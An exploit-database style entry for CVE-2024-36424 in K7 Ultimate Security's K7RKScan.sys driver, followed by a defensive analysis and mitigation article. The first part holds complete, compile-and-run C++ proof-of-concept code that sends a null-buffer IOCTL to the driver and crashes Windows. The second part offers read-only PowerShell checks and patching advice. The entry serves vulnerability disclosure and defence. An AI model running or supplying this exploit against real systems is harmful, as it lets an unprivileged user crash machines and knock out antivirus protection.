K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
# Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
# Date: 13.08.2024
# Author: M. Akil Gündoğan
# Vendor Homepage: https://k7computing.com/
# Version: < v17.0.2019
# Tested on: Windows 10 Pro x64
# CVE ID: CVE-2024-36424
# Vulnerability Description:
--------------------------------------
In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.
# Technical details and step by step Proof of Concept's (PoC):
--------------------------------------
1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.
2 - Compile the attached PoC code written in C++ as release on VS 2022.
3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.
# Impact:
--------------------------------------
An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.
# Advisories:
--------------------------------------
K7 Computing recommends that all customers update their products to the corresponding versions shown below:
K7 Ultimate Security (17.0.2019 or Higher)
# Timeline:
--------------------------------------
- 16.05.2024 - Vulnerability reported.
- 05.08.2024 - Vendor has fixed the vulnerability.
- 13.08.2024 - Released.
# References:
--------------------------------------
- Vendor: https://www.k7computing.com
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
- Repository: https://github.com/secunnix/CVE-2024-36424
# PoC Code (C++):
-------------------------------------------------------------------------------------------------------------------------
/*
# Usage: Only compile it and run, boooom :)
*/
#include <windows.h>
#include <iostream>
const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014
int main() {
std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;
HANDLE hDevice = CreateFile(driverDevice.c_str(),
GENERIC_READ | GENERIC_WRITE,
0,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDevice == INVALID_HANDLE_VALUE) {
std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
return 1;
}
void* inputBuffer = nullptr; // Null input buffer
DWORD inputBufferSize = 0;
DWORD bytesReturned;
BOOL result = DeviceIoControl(hDevice,
ioCTL,
inputBuffer,
inputBufferSize,
nullptr,
0,
&bytesReturned,
nullptr);
if (!result) {
std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
}
CloseHandle(hDevice);
return 0;
}K7 Ultimate Security (K7RKScan.sys) CVE-2024-36424 — Denial of Service (DoS) Analysis & Mitigation
This article explains the CVE-2024-36424 vulnerability affecting versions of K7 Ultimate Security prior to 17.0.2019. It summarizes the root cause at a high level, the impact, detection techniques, safe verification steps, and recommended mitigations for administrators and defenders. The guidance below focuses on defense and remediation; it intentionally avoids exploit details and any instructions that would enable malicious use.
Vulnerability Summary
CVE-2024-36424 is a local Denial-of-Service vulnerability in a kernel-mode driver distributed with K7 Ultimate Security. A flaw in the driver's handling of certain I/O requests can cause a null pointer dereference in kernel space, resulting in a system crash (Blue Screen of Death) or other unstable system behavior when invoked by a low-privileged local user. The issue was fixed by the vendor in the 17.0.2019 release.
Technical (High-level) Analysis
- The root cause is improper validation/handling of input passed to a kernel driver routine invoked via I/O control operations. When the driver assumes a pointer or structure is non-null without proper checks, dereferencing that pointer in kernel mode can trigger an immediate crash.
- The vulnerability is significant because it resides in kernel space; a null pointer dereference there generally results in a system-wide crash rather than an isolated user-space fault.
- The affected driver exposes an interface that, on the tested systems, could be triggered by non-privileged users; this increases the attack surface for local DoS.
Impact
- Local Denial of Service — any unprivileged local user or process could reliably cause a system crash, leading to downtime and potential data loss.
- Operational disruption — repeated crashes can interrupt business-critical services and processes, including endpoint protection components if they depend on the affected driver.
- Detection/Forensics complexity — crashes may remove in-memory traces, complicating incident response and root cause determination.
Who Is Affected
Systems running K7 Ultimate Security versions older than 17.0.2019 that include the vulnerable driver are affected. The vulnerability requires local access; it is not a remote code-execution flaw. Administrators should assume all installations of the affected product prior to the fixed release are potentially vulnerable until verified otherwise.
Safe Detection & Monitoring
Defenders should monitor for signs of exploitation or attempted exploitation without attempting to reproduce the vulnerability. Useful signals include unexpected system crashes, repeated reboots with a BugCheck recorded, or abnormal termination of security processes.
# PowerShell: Query recent system crash (BugCheck) events (safe, read-only)
Get-WinEvent -FilterHashtable @{
LogName = 'System';
Id = 1001; # Event ID usually used for unexpected shutdown/bugcheck reporting
StartTime = (Get-Date).AddDays(-7)
} | Select-Object TimeCreated, Message -First 50
Explanation: This read-only query lists recent system crash reports surfaced by the operating system (event ID commonly associated with crash reports). Use it to spot increased crash frequency that might indicate exploitation attempts.
How to Check If Systems Might Be Vulnerable (Safe Verification)
Do not attempt to exercise device interfaces or send custom IOCTLs to drivers. Instead, verify product and driver versions and inspect file/service presence and permissions. The following are safe, read-only checks to locate the driver file(s) and obtain version information and file ACLs.
# PowerShell: Locate K7 driver files and report file version and ACL info (read-only)
$drivers = Get-ChildItem -Path 'C:\Program Files*','C:\Program Files (x86)*' -Filter 'K7RKScan.sys' -Recurse -ErrorAction SilentlyContinue
if (-not $drivers) {
Write-Output "No K7RKScan.sys file found under Program Files paths."
} else {
foreach ($d in $drivers) {
$vi = $d.VersionInfo
Write-Output "Path: $($d.FullName)"
Write-Output "FileVersion: $($vi.FileVersion)"
Write-Output "ProductVersion: $($vi.ProductVersion)"
Write-Output "Owner: $((Get-Acl $d.FullName).Owner)"
Write-Output "------"
}
}
Explanation: This script searches typical Program Files locations for the driver file, prints file version metadata, and reports the file owner. Comparing FileVersion/ProductVersion to the vendor’s fixed release (17.0.2019) lets administrators determine whether the installed driver is older and therefore potentially vulnerable.
Recommended Remediation
- Patch immediately: apply the vendor update that contains the fix (upgrade to 17.0.2019 or later). Vendor advisories and official packages are the authoritative source for fixes.
- Apply via approved patch management: use your normal change control and patch distribution channels to deploy updates across the estate and verify successful installation.
- If you cannot patch immediately, consider temporary mitigations — see the caution below — and prioritize compensating controls for exposed systems (network isolation, restricting local accounts, increasing monitoring). Contact the vendor for guidance before removing or disabling endpoint protection components.
- After patching, validate by checking file version(s) and monitoring for crash-related events. Maintain a schedule to ensure rollouts complete across all endpoints.
Caution on Temporary Measures: Disabling or uninstalling endpoint protection can reduce your security posture. Only take such actions when coordinated with operational and security stakeholders, and preferably with vendor guidance. In many environments, vendor-supplied hotfixes or configuration changes will be safer than removal.
Detection & EDR Recommendations
- Create or tune SIEM rules to alert on increased frequency of crash/BugCheck events and unexpected reboots on endpoints that run K7 products.
- Monitor for abnormal termination of K7-related services or processes and correlate with system crash events.
- Use EDR policies to restrict untrusted local code execution and to detect processes attempting to interact with kernel drivers in suspicious ways. Keep detection rules focused on behavioral indicators rather than product-specific IO control values.
Best Practices & Hardening
- Enforce least privilege: avoid granting unnecessary local accounts elevated rights that can interact with kernel drivers.
- Keep endpoint protection and other security tooling up to date through automated patching and vendor notification subscriptions.
- Maintain robust logging, centralize event collection, and establish baselines so deviations triggered by crashes or tampering are visible quickly.
- Use change management to validate driver and product updates and to ensure rollbacks are possible if an update causes issues.
Vendor Response and Timeline
| Event | Date |
|---|---|
| Vulnerability reported | 2024-05-16 |
| Vendor fix released | 2024-08-05 |
| Public disclosure | 2024-08-13 |
References and Further Reading
Final Notes for Administrators
Prioritize patching across your environment, validate that fixes have been applied, and monitor endpoints for residual signs of instability. If you observe repeated unexplained crashes on endpoints with K7 products installed, collect relevant logs (system event logs, crash dumps) and coordinate with your vendor for analysis. Avoid attempting exploit reproduction in production environments — the safest course is patching and monitoring.